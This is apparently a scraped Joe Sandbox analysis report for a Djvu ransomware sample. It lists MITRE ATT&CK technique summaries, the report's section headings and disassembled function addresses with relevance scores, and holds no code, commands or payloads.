Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report bP5g4FsSJk.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Djvu

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
bP5g4FsSJk.exe

Function 042357C6 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 04235485 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Function 0423671C Relevance: .1, Instructions: 105
COMMON

Function 00419F90 Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565
COMMONCrypto

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Function 0040CF10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228
networkfileCOMMON

Function 00427B0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 7
COMMONLIBRARYCODE

Function 00427F3D Relevance: 1.5, APIs: 1, Instructions: 9
COMMON

Function 0041E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696
stringnetworkfileCOMMONCrypto

Function 0040D240 Relevance: 56.7, APIs: 24, Strings: 8, Instructions: 702
comCOMMONCrypto

Function 0040DD40 Relevance: 53.2, APIs: 22, Strings: 8, Instructions: 735
stringnetworkmemoryCOMMONCrypto

Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149
encryptionstringCOMMON

Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95
stringmemorywindowCOMMON

Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732
COMMONCrypto

Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165
encryptionCOMMON

Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159
encryptionCOMMON

Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78
COMMON

Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660
COMMONCrypto

Function 004382A2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56
COMMONLIBRARYCODE

Function 0040C070 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 280
COMMONCrypto

Function 00424168 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72
COMMONLIBRARYCODE

Function 004329EC Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Function 004387C8 Relevance: 1.5, APIs: 1, Instructions: 20
COMMONLIBRARYCODE

Function 004329BB Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 0040A710 Relevance: .3, Instructions: 345
COMMONCrypto

Function 0040BDC0 Relevance: .2, Instructions: 239
COMMONCrypto

Function 00420F30 Relevance: .1, Instructions: 76
COMMONCrypto

Function 0040A660 Relevance: .1, Instructions: 71
COMMONCrypto

Function 00411CD0 Relevance: 79.1, APIs: 36, Strings: 9, Instructions: 382
stringregistrylibraryCOMMON

Function 004124E0 Relevance: 79.0, APIs: 36, Strings: 9, Instructions: 214
synchronizationCOMMON

Function 004635B0 Relevance: 21.5, APIs: 7, Strings: 5, Instructions: 475
COMMONLIBRARYCODE

Function 00425A97 Relevance: 19.6, APIs: 13, Instructions: 84
COMMONLIBRARYCODE

Function 0041BAE0 Relevance: 18.3, APIs: 12, Instructions: 320
windowCOMMON

Function 00425B6E Relevance: 18.1, APIs: 12, Instructions: 131
COMMONLIBRARYCODE